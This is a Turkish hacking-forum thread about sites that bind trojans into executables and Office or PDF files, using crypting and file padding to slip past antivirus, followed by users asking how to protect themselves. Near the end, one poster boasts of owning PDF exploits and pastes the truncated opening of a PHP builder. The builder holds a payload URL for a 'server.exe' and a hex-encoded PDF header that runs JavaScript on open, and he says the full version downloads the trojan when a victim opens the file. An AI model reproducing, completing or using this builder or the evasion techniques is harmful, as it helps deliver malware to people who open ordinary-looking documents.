Forum
Aktif konular
Üyeler
Kurallar
Arama
İnternetde Exele Binder Gömen Siteler İnternetde Exele Binder Gömen Siteler
-
cryptosuite.org
wardom.org
anti-av.org
ve ismini daha yasamadığım birçok site
tatkigi açıklayalım
ilk önce sabit trojan codu crypte ediliyor header saklanıyor.
bu sayede antivirüsler hex yasa basic olarak kodu okudunda veri tabanında bulamiyor ve exenin zararsız oldugunu belirtiyor
zararsız görülen exe çabuk patlamasın diye
boyutu büyük exe ler ile pacth ediliyor birleştiriliyor bu sayede hem rapor etmesi zorlanıyor hemde exenin antilere yakalanması günçleniyor.
nasıl korunursunuz.
kişisel koruma yazılımları yada ağ izleme yazılımları ile korunursunuz.
-
ustata yapmaz ya:S videoyla ispatlarsan hocam süper olur. + anti-av.org kapandı
-
SUPERBICO bunu yazdı:
-----------------------------ustata yapmaz ya:S videoyla ispatlarsan hocam süper olur. + anti-av.org kapandı
-----------------------------yapmaz etmez dedin adamlar onu yapan adam herseyide yapar buna emin ol
-
ne yani wardom a her girdiğimizde bilgisayara virus mü sokmuş oluyoruz biraz daha açıklarmısın? Wardom a bazen bakıyorum çünkü... bazen benimde dikkatimi çekiyor bazı sitelere girdikten sonra ilginç yerlerde site isminde klasörler buluyorum... bazende exe dosyaları görüyorum temporary internet files içinde, biraz daha düzgün izah edersen sevinirim... kis kullandığım için pek umursamadım ama tanınamaz yapıyorlar diyorsun
bunun yapan siteleri nasıl farkedebiliriz en önemliside bu
-
oha :| wardom'a bende google ile birseyler arayinca girdigim oluyordu..
"kişisel koruma yazılımları yada ağ izleme yazılımları ile korunursunuz."
bu tür korumalar icin hangi programlari önerirsin hocam ? -
wardom.org
1st Class: 0 Keylog kaydı 262 Online bot 190 Msn Şifresi 49 Reklam botu varadamlar para için kendi üyelerini kekliyorlar.tbtyi sewmemin nedeni bu
-
doc xls pdf de kullananlar çok
-
yani bu istedikleri her exe yi bizim bilgisayarda çalıştırabiler mi demek??
-
driveshaft bunu yazdı:
-----------------------------
yani bu istedikleri her exe yi bizim bilgisayarda çalıştırabiler mi demek??
-----------------------------bi siteye girdiğin anda exe çalışması downloader ile olur fiyatı 1-2-3 milyar olabiliyor :)
ama bunların yaptığı exel-pdf-word gibi dosyalara gömmek.
yani siteye girdiğin anda virüs bulaştıran site türkiyede çok az 1-2 tanedir en fazla.
word-pdf gibi dosyalardan korunmanın yolunuda sen bulucaksın :D
kullanmışlığım vardır. :)
zemana antilogger + ashampoo firewall + 1 yada 2 antivirüs anca keser :D
-
pcdoktor636 bunu yazdı:
-----------------------------
driveshaft bunu yazdı:
-----------------------------
yani bu istedikleri her exe yi bizim bilgisayarda çalıştırabiler mi demek??
-----------------------------bi siteye girdiğin anda exe çalışması downloader ile olur fiyatı 1-2-3 milyar olabiliyor :)
ama bunların yaptığı exel-pdf-word gibi dosyalara gömmek.
yani siteye girdiğin anda virüs bulaştıran site türkiyede çok az 1-2 tanedir en fazla.
word-pdf gibi dosyalardan korunmanın yolunuda sen bulucaksın :D
kullanmışlığım vardır. :)
zemana antilogger + ashampoo firewall + 1 yada 2 antivirüs anca keser :D
-----------------------------word pdf gibi anlatmamış galiba, bir word dosyası internete bağlanmak istese ümüğünü sıkarız firewalla
-
driveshaft bunu yazdı:
-----------------------------
pcdoktor636 bunu yazdı:
-----------------------------
driveshaft bunu yazdı:
-----------------------------
yani bu istedikleri her exe yi bizim bilgisayarda çalıştırabiler mi demek??
-----------------------------bi siteye girdiğin anda exe çalışması downloader ile olur fiyatı 1-2-3 milyar olabiliyor :)
ama bunların yaptığı exel-pdf-word gibi dosyalara gömmek.
yani siteye girdiğin anda virüs bulaştıran site türkiyede çok az 1-2 tanedir en fazla.
word-pdf gibi dosyalardan korunmanın yolunuda sen bulucaksın :D
kullanmışlığım vardır. :)
zemana antilogger + ashampoo firewall + 1 yada 2 antivirüs anca keser :D
-----------------------------word pdf gibi anlatmamış galiba, bir word dosyası internete bağlanmak istese ümüğünü sıkarız firewalla
-----------------------------internete bağlancak demedimki bende zaten :D
bindlemek yani birleştirmekten bahsediyorum.
pdf exploitleri var elimde.
örnek olarak kodun sadece 5-6 satırını veriyorum :)
<?php
# Config
$url = "http://localhost/server.exe";
$pdf1 = "\x25\x50\x44\x46\x2d\x31\x2e\x33\x0a\x25\xe2\xe3\xcf\xd3\x0a\x31\x20\x30\x20\x6f\x62\x6a\x0a\x3c\x3c\x2f\x4f\x70\x65\x6e\x41\x63\x74\x69\x6f\x6e\x20\x3c\x3c\x2f\x4a\x53\x20\x28\x74\x68\x69\x73\x2e\x4e\x65\x77\x5f\x53\x63\x72\x69\x70\x74\x5c\x28\x5c\x29\x29\x0a\x2f\x53\x20\x2f\x4a\x61\x76\x61\x53\x63\x72\x69\x70\x74\x0a\x3e\x3e\x0a\x2f\x54\x68\x72\x65\x61\x64\x73\x20\x32\x20\x30\x20\x52\x0a\x2f\x4f\x75\x74\x6c\x69\x6e\x65\x73\x20\x33\x20\x30\x20\x52\x0a\x2f\x50\x61\x67\x65\x73\x20\x34\x20\x30\x20\x52\x0a\x2f\x56\x69\x65\x77\x65\x72\x50\x72\x65\x66\x65\x72\x65\x6e\x63\x65\x73\x20\x3c\x3c\x2f\x50\x61\x67\x65\x44\x69\x72\x65\x63\x74\x69\x6f\x6e.... shell code uzayıp gidiyor çok uzundu kestim :)
function uencode($s)
{ve burdan sonrada upuzun bir kod var :)
bu bi exploit mesela bunu pdf dosyasına gömmek için.
pdf ye gömdüğün zaman direk serverı indirir.
tabi bu internete bağlanan türü.
bunun localde çalışanlarıda var.
şöyleki:dosyayı birleştiriyorsun dökümanla.
açtığı anda sorgusuz sualsiz çalışıyor server.
firewall sadece 127.0.0.1 diye uyarı verebilir.
ama zemana antilogger code injector diye uyarı verir ne olduğunu anlarsın.
o yüzden sadece firewalle güvenilmez :)
Kısayol
Şikayet
Özel Mesaj
Alıntı yap
Cevapla